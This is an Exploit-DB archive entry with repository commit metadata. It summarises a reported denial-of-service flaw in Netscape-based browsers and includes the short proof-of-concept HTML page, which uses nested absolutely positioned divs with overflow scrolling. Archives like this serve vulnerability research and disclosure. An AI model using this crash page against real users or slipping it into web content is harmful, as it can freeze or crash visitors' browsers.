exploit-db-mirror/exploits/unix/dos/22286.html
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

10 lines
No EOL
526 B
HTML

source: https://www.securityfocus.com/bid/6937/info
It has been reported that Netscape based browsers may be vulnerable to a denial of service condition when rendering certain style sheet code.
If a malicious page is viewed the browser reportedly becomes unstable. One possible condition mentioned was critical failure of the browser while another condition reportedly utilized all CPU resources.
<html> <body>
<div style="position:absolute;">
<div style="position:absolute; overflow:scroll"> </div> </div>
</body> </html>